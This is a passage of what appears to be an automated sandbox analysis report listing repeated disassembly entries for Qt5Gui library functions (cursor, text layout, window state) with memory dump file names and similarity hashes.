                                                                                                                                                                                                                • ?cursor@QWindow@@QEBA?AVQCursor@@XZ.QT5GUI ref: 00007FFB9A30BF48
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?cursor@Cursor@@Window@@malloc
                                                                                                                                                                                                                • String ID: QWindow$cursor$cursor(self) -> QCursor
                                                                                                                                                                                                                • API String ID: 2860300759-1668880385
                                                                                                                                                                                                                • Opcode ID: 69be702e468362f1bd71fb5158563cf982a12c9e9e08dcf7ed756cdfe2cd2068
                                                                                                                                                                                                                • Instruction ID: 07d1ae22b01f68660fe11a5787bb40fcbe14c01f39b156fb088f7e6791658b98
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69be702e468362f1bd71fb5158563cf982a12c9e9e08dcf7ed756cdfe2cd2068
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E115BB5B08A5681FB50DF75E8586A933A8FB85B84FA140B6CD5D03320CF7CD589C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?discardCommand@QSessionManager@@QEBA?AVQStringList@@XZ.QT5GUI ref: 00007FFB9A303F18
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?discardCommand@List@@Manager@@SessionStringmalloc
                                                                                                                                                                                                                • String ID: QSessionManager$discardCommand$discardCommand(self) -> List[str]
                                                                                                                                                                                                                • API String ID: 1524762267-3557297886
                                                                                                                                                                                                                • Opcode ID: aa8cf092a7c0d09c87d1ca4e65e314cce4992f861144479576a2b979a166d475
                                                                                                                                                                                                                • Instruction ID: f0512ca167e3e830b37497c3129c2207435cc55b855d242a92ed908d4cf97e29
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa8cf092a7c0d09c87d1ca4e65e314cce4992f861144479576a2b979a166d475
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF112DB5B08A96C1EB10DF75E8996A933A8FB55B84FA180B6CE4D13320DF7DD549C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?boundingRect@QTextLayout@@QEBA?AVQRectF@@XZ.QT5GUI ref: 00007FFB9A2F5F18
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?boundingLayout@@RectRect@Textmalloc
                                                                                                                                                                                                                • String ID: QTextLayout$boundingRect$boundingRect(self) -> QRectF
                                                                                                                                                                                                                • API String ID: 620106861-2289836743
                                                                                                                                                                                                                • Opcode ID: d6a6e2bae909e763cc0f0e69c341b9404335dca903f927abcbb307d81ef0c13c
                                                                                                                                                                                                                • Instruction ID: c63162f6123d41dae39b4b09d9ef10fcdf734a3f5bc107447d3e3209c595b320
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6a6e2bae909e763cc0f0e69c341b9404335dca903f927abcbb307d81ef0c13c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 121135B5B08A4681EB209F65E8586A933A8FB95B84FA180B2CE0C43320DF7CE549C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?toVector4D@QVector2D@@QEBA?AVQVector4D@@XZ.QT5GUI ref: 00007FFB9A339B18
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Vector4$Vector2malloc
                                                                                                                                                                                                                • String ID: QVector2D$toVector4D$toVector4D(self) -> QVector4D
                                                                                                                                                                                                                • API String ID: 311956697-3690013905
                                                                                                                                                                                                                • Opcode ID: e5904921a024085fc3ee456001a23ef0ffaa9fab3ce9227f7a8231a42308805b
                                                                                                                                                                                                                • Instruction ID: 34d7b9161dc21028d97d1a00722a84531bd1428ea0e71863e22bbde88d220905
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5904921a024085fc3ee456001a23ef0ffaa9fab3ce9227f7a8231a42308805b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44115BB5B08A46C1EB10DF75E8986A937A8FB54B84FA180B6CD0C47320CF7CE58AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?windowStates@QWindow@@QEBA?AV?$QFlags@W4WindowState@Qt@@@@XZ.QT5GUI ref: 00007FFB9A317F28
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?windowFlags@Qt@@@@State@States@WindowWindow@@malloc
                                                                                                                                                                                                                • String ID: QWindow$windowStates$windowStates(self) -> Qt.WindowStates
                                                                                                                                                                                                                • API String ID: 1775758369-1511991782
                                                                                                                                                                                                                • Opcode ID: 825799bd466c0ee590184e4f0af9fa1dfd37a07b5e19c3150ea2d39bdba76108
                                                                                                                                                                                                                • Instruction ID: a13eefaf25b6953ed05fe41eff638d6a25f744e6899154de740578278996ab39
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 825799bd466c0ee590184e4f0af9fa1dfd37a07b5e19c3150ea2d39bdba76108
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 461109B5B08A4681FB50DB65E8486A937A8FB95B94FA180B6CE5D03320CF7CD589C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?text@QTextLayout@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FFB9A2EFB98
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?text@Layout@@String@@Textmalloc
                                                                                                                                                                                                                • String ID: QTextLayout$text$text(self) -> str
                                                                                                                                                                                                                • API String ID: 2459105123-1337286841
                                                                                                                                                                                                                • Opcode ID: dc49fa71e1f572835633aea6f5e9734dda4afc752d4180fa8c930e08fbcc0c62
                                                                                                                                                                                                                • Instruction ID: b421336eef139282573b2e023064742cce12ba8ed781fc1e82730f6541884537
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc49fa71e1f572835633aea6f5e9734dda4afc752d4180fa8c930e08fbcc0c62
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89115BB5B08A4681EB10DF35E8586A933A8FB55B84FA180B6CD4C03320CF7DD549C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?end@QTextFrame@@QEBA?AViterator@1@XZ.QT5GUI ref: 00007FFB9A353BD8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?end@Frame@@TextViterator@1@malloc
                                                                                                                                                                                                                • String ID: QTextFrame$end$end(self) -> QTextFrame.iterator
                                                                                                                                                                                                                • API String ID: 799124393-352633679
                                                                                                                                                                                                                • Opcode ID: afe4439b42dd42eaf82e3228133bf4783a2b7293ef2abb54e4fe7b690466bf96
                                                                                                                                                                                                                • Instruction ID: 14353d9ea09e13d613680ef74053614aa1c45b5c64b43a4ea107f220dbd62882
                                                                                                                                                                                                                • Opcode Fuzzy Hash: afe4439b42dd42eaf82e3228133bf4783a2b7293ef2abb54e4fe7b690466bf96
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE1109B5B08A8681EB209F75E8596A937A8FB55B84FA180B6CD1D43320DF7DD549C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?font@QTextItem@@QEBA?AVQFont@@XZ.QT5GUI ref: 00007FFB9A2EBBB8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
